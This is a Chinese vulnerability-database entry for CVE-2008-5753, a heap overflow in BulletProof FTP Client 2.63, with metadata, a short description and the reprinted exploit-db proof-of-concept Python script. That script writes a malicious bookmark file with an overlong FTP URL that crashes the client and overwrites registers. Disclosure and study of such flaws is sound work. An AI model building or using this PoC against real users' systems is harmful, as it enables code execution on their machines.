BulletProof FTP客户端名称处理堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117136 漏洞类型 缓冲区溢出
发布时间 2008-12-24 更新时间 2009-01-29
CVE编号 CVE-2008-5753 CNNVD-ID CNNVD-200812-476
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7571
https://cxsecurity.com/issue/WLB-2009010100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-476
|漏洞详情
BulletProofFTPServer之前名为G6FTPServer,是一款全功能的Windows平台FTP服务器软件。BulletProofFTP客户端在处理恶意的服务器名称时存在堆溢出漏洞。如果用户试图连接到带有超长名称的服务器(如导入恶意站点列表然后连接到指定的服务器),就会触发这个溢出,导致执行任意指令。
|漏洞EXP
#!/usr/bin/python
#
#                   
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |      |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |     | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application :		BulletProof FTP (Client)  V2.63
#
# [+] Vendor URL :		http://www.bpftp.com/
#
# [+] Bug :			BulletProof FTP Client Local Heap Overflow (PoC)
#
# [+] Author :			His0k4
#
# [+] Greetings :		All friends & Muslims Hackers (dz)
#---------------------------------------------------------------------------------
# EAX 41414141
# ECX 016EC370
# EDX 00000000
# EBX 41414141
# ESP 0012F548
# EBP 0012F5C4 ASCII "AAAAAAAAAAAA"
# ESI 0170E70A ASCII "]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EDI 0170E90A ASCII 03,"ftp"
# EIP 00596423 bpftpcli.00596423
#---------------------------------------------------------------------------------


header1 = "; This file was exported from BulletProof FTP Client vBulletProof FTP Client v2.63 (Build 56)\n"
header2 = "; Sitename=test site\n"
buff = "FTP://user:pass@" + "\x41" * 93


vuln = header1 + header2 + buff

try:
    out_file = open("sites.txt",'w')
    out_file.write(vuln)
    out_file.close()
    raw_input("\nBookmark file created!\n\nNow import the file and run it\n\nPress to exit...")
except:
    print "Error!"
	
# EoF

# milw0rm.com [2008-12-24]
|参考资料

来源:BID
名称:33007
链接:http://www.securityfocus.com/bid/33007
来源:MILW0RM
名称:7571
链接:http://www.milw0rm.com/exploits/7571
来源:SREASON
名称:4835
链接:http://securityreason.com/securityalert/4835
来源:SECUNIA
名称:33322
链接:http://secunia.com/advisories/33322
来源:OSVDB
名称:50968
链接:http://osvdb.org/50968